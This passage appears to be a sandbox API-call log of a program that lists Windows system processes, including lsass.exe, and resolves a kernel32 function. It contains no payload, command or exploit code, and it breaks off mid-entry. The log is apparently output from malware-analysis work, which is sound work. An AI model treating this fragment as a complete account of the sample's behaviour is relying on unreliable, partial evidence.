1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="1024") returned 4 [0158.404] lstrcpynA (in: lpString1=0x33f5c8, lpString2="winlogon.exe", iMaxLength=1024 | out: lpString1="winlogon.exe") returned="winlogon.exe" [0158.404] lstrcpyA (in: lpString1=0x431400, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="-1") returned 2 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3305840") returned 7 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | 
out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="13") returned 2 [0158.404] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.404] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.404] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA 
(in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.405] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.405] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.406] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.406] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.406] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3305872") returned 7 [0158.406] lstrcpyA (in: lpString1=0x33e508, lpString2="3305872" | out: lpString1="3305872") returned="3305872" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="476") returned 3 [0158.406] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3306760") returned 7 [0158.406] lstrcpyA (in: lpString1=0x430800, lpString2="3306760" | out: lpString1="3306760") returned="3306760" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 
[0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="920") returned 3 [0158.406] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.406] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3305872") returned 7 [0158.407] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.407] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.407] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.407] lstrcpynA (in: lpString1=0x340df8, lpString2="services.exe", iMaxLength=1024 | out: lpString1="services.exe") returned="services.exe" [0158.407] lstrcpyA (in: lpString1=0x431400, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3306760") returned 7 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.407] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="13") returned 
2 [0158.407] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.407] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.407] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.407] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.408] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.408] lstrcpyA (in: lpString1=0x33e508, lpString2="3306792" | out: lpString1="3306792") returned="3306792" [0158.408] lstrcpyA (in: lpString1=0x431800, lpString2="484" | out: lpString1="484") returned="484" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] 
wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3307424") returned 7 [0158.408] lstrcpyA (in: lpString1=0x430800, lpString2="3307424" | out: lpString1="3307424") returned="3307424" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="656") returned 3 [0158.408] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.408] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3306792") returned 7 [0158.409] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.409] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.409] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.409] lstrcpyA (in: lpString1=0x431400, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="-1") returned 2 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3307424") returned 7 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="10") returned 2 [0158.409] lstrcpyA (in: lpString1=0x430000, 
lpString2="10" | out: lpString1="10") returned="10" [0158.409] lstrcpyA (in: lpString1=0x33e508, lpString2="3307448" | out: lpString1="3307448") returned="3307448" [0158.409] lstrcpyA (in: lpString1=0x431800, lpString2="492" | out: lpString1="492") returned="492" [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3308272") returned 7 [0158.409] lstrcpyA (in: lpString1=0x430800, lpString2="3308272" | out: lpString1="3308272") returned="3308272" [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="840") returned 3 [0158.410] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.410] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3307448") returned 7 [0158.410] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.410] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.410] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.410] lstrcpyA (in: lpString1=0x431400, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="-1") returned 2 [0158.410] wsprintfA (in: param_1=0x3401e0, 
param_2="%d" | out: param_1="3308272") returned 7 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="8") returned 1 [0158.410] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.410] lstrcpyA (in: lpString1=0x33e508, lpString2="3308288" | out: lpString1="3308288") returned="3308288" [0158.410] lstrcpyA (in: lpString1=0x431800, lpString2="600" | out: lpString1="600") returned="600" [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3309176") returned 7 [0158.410] lstrcpyA (in: lpString1=0x430800, lpString2="3309176" | out: lpString1="3309176") returned="3309176" [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="912") returned 3 [0158.411] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3308288") returned 7 [0158.411] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.411] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.411] lstrcpyA (in: 
lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.411] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="-1") returned 2 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3309176") returned 7 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="12") returned 2 [0158.411] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.411] lstrcpyA (in: lpString1=0x33e508, lpString2="3309200" | out: lpString1="3309200") returned="3309200" [0158.411] lstrcpyA (in: lpString1=0x431800, lpString2="664" | out: lpString1="664") returned="664" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3309896") returned 7 [0158.411] lstrcpyA (in: lpString1=0x430800, lpString2="3309896" | out: lpString1="3309896") returned="3309896" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="720") returned 3 [0158.411] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: 
lpString1="720") returned="720" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3309200") returned 7 [0158.412] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.412] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="-1") returned 2 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3309896") returned 7 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="12") returned 2 [0158.412] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="3309920" | out: lpString1="3309920") returned="3309920" [0158.412] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3311512") returned 7 [0158.412] lstrcpyA (in: lpString1=0x430800, lpString2="3311512" | out: lpString1="3311512") returned="3311512" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" 
| out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="1616") returned 4 [0158.412] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3309920") returned 7 [0158.412] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.412] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="-1") returned 2 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3311512") returned 7 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="12") returned 2 [0158.413] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.413] lstrcpyA (in: lpString1=0x33e508, lpString2="3311536" | out: lpString1="3311536") returned="3311536" [0158.413] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3313000") returned 7 [0158.413] lstrcpyA (in: lpString1=0x430800, 
lpString2="3313000" | out: lpString1="3313000") returned="3313000" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1488") returned 4 [0158.413] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3311536") returned 7 [0158.413] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.413] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.413] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.413] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="-1") returned 2 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3313000") returned 7 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="12") returned 2 [0158.413] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.414] lstrcpyA (in: lpString1=0x33e508, lpString2="3313024" | 
out: lpString1="3313024") returned="3313024" [0158.414] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3315192") returned 7 [0158.414] lstrcpyA (in: lpString1=0x430800, lpString2="3315192" | out: lpString1="3315192") returned="3315192" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="2192") returned 4 [0158.414] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3313024") returned 7 [0158.414] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.414] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.414] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.414] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.414] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.414] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.414] lstrcpyA (in: lpString1=0x33e508, 
lpString2="3315216" | out: lpString1="3315216") returned="3315216" [0158.414] lstrcpyA (in: lpString1=0x431800, lpString2="932" | out: lpString1="932") returned="932" [0158.415] lstrcpyA (in: lpString1=0x430800, lpString2="3315848" | out: lpString1="3315848") returned="3315848" [0158.415] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.415] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.415] lstrcpyA (in: lpString1=0x431400, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0158.415] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="3315872" | out: lpString1="3315872") returned="3315872" [0158.415] lstrcpyA (in: lpString1=0x431800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.415] lstrcpyA (in: lpString1=0x430800, lpString2="3316952" | out: lpString1="3316952") returned="3316952" [0158.415] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.415] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.415] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.415] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") 
returned="12" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="3316976" | out: lpString1="3316976") returned="3316976" [0158.416] lstrcpyA (in: lpString1=0x431800, lpString2="536" | out: lpString1="536") returned="536" [0158.416] lstrcpyA (in: lpString1=0x430800, lpString2="3318184" | out: lpString1="3318184") returned="3318184" [0158.416] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.416] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.416] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.416] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="3318208" | out: lpString1="3318208") returned="3318208" [0158.416] lstrcpyA (in: lpString1=0x431800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.416] lstrcpyA (in: lpString1=0x430800, lpString2="3319224" | out: lpString1="3319224") returned="3319224" [0158.416] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.416] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.417] lstrcpyA (in: lpString1=0x431400, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0158.417] lstrcpyA (in: 
